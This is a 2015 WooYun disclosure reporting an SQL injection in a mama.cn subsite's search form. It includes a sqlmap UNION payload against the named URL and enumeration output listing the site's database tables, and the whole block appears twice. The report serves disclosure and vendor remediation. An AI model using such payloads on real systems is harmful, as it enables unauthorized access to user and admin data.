当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0121405

漏洞标题:妈妈网某站存在SQL注入漏洞

相关厂商:妈妈网

漏洞作者: 风若新

提交时间:2015-06-18 17:34

修复时间:2015-08-02 17:50

公开时间:2015-08-02 17:50

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-18: 细节已通知厂商并且等待厂商处理中
2015-06-18: 厂商已经确认,细节仅向厂商公开
2015-06-28: 细节向核心白帽子及相关领域专家公开
2015-07-08: 细节向普通白帽子公开
2015-07-18: 细节向实习白帽子公开
2015-08-02: 细节向公众公开

简要描述:

妈妈网某站存在SQL注入漏洞

详细说明:

找了下,找到妈妈网某个网站子系统,存在SQL注入漏洞
地址:http://zhufu2015.mama.cn
收索框存在注入漏洞

http://zhufu2015.mama.cn/List/search


---
Place: POST
Parameter: subject
Type: UNION query
Title: MySQL UNION query (NULL) - 8 columns
Payload: subject=sdf') LIMIT 1,1 UNION ALL SELECT NULL, CONCAT(0x3a6665703a,0x726e537172774c534a51,0x3a6a736a3a), NULL, NULL, NULL, NULL, NULL, NULL#
---
[16:50:48] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL 5
[16:50:48] [INFO] fetching database names
available databases [3]:
[*] information_schema
[*] test
[*] weixin


Database: weixin
[51 tables]
+-------------------------+
| app_authcute_activities |
| app_authcute_addact |
| app_authcute_today |
| app_authcute_userinfo |
| app_authcute_voterecord |
| app_blessing_district |
| app_blessing_user |
| app_blessing_video |
| app_com_active |
| app_common_user |
| app_hotmon_likes |
| app_hotmon_user |
| app_hotmon_user_pic |
| app_reward_act |
| app_reward_count |
| app_reward_gift |
| app_reward_record |
| app_reward_user_gift |
| app_reward_userinfo |
| app_temawang_video |
| app_tevideo_total |
| app_tevideo_user |
| app_wildkid_activities |
| app_wildkid_today |
| app_wildkid_userinfo |
| app_wildkid_usertime |
| app_wildkid_voterecord |
| cutebaby_activities |
| cutebaby_user_info |
| cutebaby_vote_record |
| scrape_act_setting |
| scrape_gift_list |
| scrape_invite_userinfo |
| scrape_link |
| scrape_lottery |
| scrape_share |
| scrape_userinfo |
| wx_admin_account |
| wx_admin_attachment |
| wx_admin_data_menu |
| wx_admin_mass |
| wx_admin_material |
| wx_admin_menu |
| wx_admin_message |
| wx_admin_msg_register |
| wx_admin_noaction_reply |
| wx_admin_reply |
| wx_admin_rule |
| wx_admin_system_user |
| wx_admin_user |
| wx_admin_widget |
+-------------------------+


好吧,就这些了,未在深入

漏洞证明:

找了下,找到妈妈网某个网站子系统,存在SQL注入漏洞
地址:http://zhufu2015.mama.cn
收索框存在注入漏洞

http://zhufu2015.mama.cn/List/search


---
Place: POST
Parameter: subject
Type: UNION query
Title: MySQL UNION query (NULL) - 8 columns
Payload: subject=sdf') LIMIT 1,1 UNION ALL SELECT NULL, CONCAT(0x3a6665703a,0x726e537172774c534a51,0x3a6a736a3a), NULL, NULL, NULL, NULL, NULL, NULL#
---
[16:50:48] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL 5
[16:50:48] [INFO] fetching database names
available databases [3]:
[*] information_schema
[*] test
[*] weixin


Database: weixin
[51 tables]
+-------------------------+
| app_authcute_activities |
| app_authcute_addact |
| app_authcute_today |
| app_authcute_userinfo |
| app_authcute_voterecord |
| app_blessing_district |
| app_blessing_user |
| app_blessing_video |
| app_com_active |
| app_common_user |
| app_hotmon_likes |
| app_hotmon_user |
| app_hotmon_user_pic |
| app_reward_act |
| app_reward_count |
| app_reward_gift |
| app_reward_record |
| app_reward_user_gift |
| app_reward_userinfo |
| app_temawang_video |
| app_tevideo_total |
| app_tevideo_user |
| app_wildkid_activities |
| app_wildkid_today |
| app_wildkid_userinfo |
| app_wildkid_usertime |
| app_wildkid_voterecord |
| cutebaby_activities |
| cutebaby_user_info |
| cutebaby_vote_record |
| scrape_act_setting |
| scrape_gift_list |
| scrape_invite_userinfo |
| scrape_link |
| scrape_lottery |
| scrape_share |
| scrape_userinfo |
| wx_admin_account |
| wx_admin_attachment |
| wx_admin_data_menu |
| wx_admin_mass |
| wx_admin_material |
| wx_admin_menu |
| wx_admin_message |
| wx_admin_msg_register |
| wx_admin_noaction_reply |
| wx_admin_reply |
| wx_admin_rule |
| wx_admin_system_user |
| wx_admin_user |
| wx_admin_widget |
+-------------------------+


好吧,就这些了,未在深入

修复方案:

过滤咯

版权声明:转载请注明来源 风若新@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2015-06-18 17:49

厂商回复:

谢谢

最新状态:

暂无


漏洞评价:

评论